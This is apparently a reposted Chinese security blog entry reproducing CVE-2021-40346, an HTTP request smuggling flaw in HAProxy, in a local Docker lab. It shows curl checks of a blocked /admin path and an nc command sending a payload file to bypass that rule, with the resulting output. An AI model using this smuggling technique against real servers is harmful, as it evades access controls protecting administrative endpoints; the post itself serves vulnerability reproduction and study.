CVE-2021-40346（HAProxy HTTP 走私）屁噢C

2022年5月23日11:01:32评论65 views字数 762阅读2分32秒阅读模式

docker启动

$ docker build -t cve-2021-40346 .$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-403464941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4

测试：

确认/admin被拒绝。

$ curl http://localhost:8000hello$ curl http://localhost:8000/admin<html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

你不会/admin在日志中看到。这意味着请求没有到达后端服务器，因为 HAProxy 拒绝了它。

$ docker logs pocserver start at port 8000/

然后，您可以确保它可以被 payload.txt 绕过。

$ cat payload.txt | nc localhost 8000HTTP/1.1 200 OKcontent-type: text/plaindate: Wed, 08 Sep 2021 22:31:10 GMTkeep-alive: timeout=5transfer-encoding: chunked
6hello
0

你会/admin在日志中找到。

$ docker logs pocserver start at port 8000///admin

项目地址：

aHR0cHM6Ly9naXRodWIuY29tL2tucXlmMjYzL0NWRS0yMDIxLTQwMzQ2

本文始发于微信公众号（Khan安全攻防实验室）：CVE-2021-40346（HAProxy HTTP 走私）屁噢C

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2021-40346（HAProxy HTTP 走私）屁噢C

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘（CVE-2024-25852）

Windows 管理员到内核的权限提升漏洞分析 (CVE-2024-21338)

kkFileView-v4.3.0-RCE

CVE-2024-20697：WINDOWS LIBARCHIVE 远程代码执行漏洞

Palo Alto Networks PAN-OS 命令注入漏洞(CVE-2024-3400)

(互联网未公开)建云科技系统存在SQL注入漏洞

CVE-2024-3400

[漏洞复现] Progress Software Flowmon CVE-2024-2389 命令执行漏洞

Weblogic RCE(CVE-2024-21006)

【漏洞复现】Saber企业级开发平台-SQL注入-list

发表评论

在线咨询

微信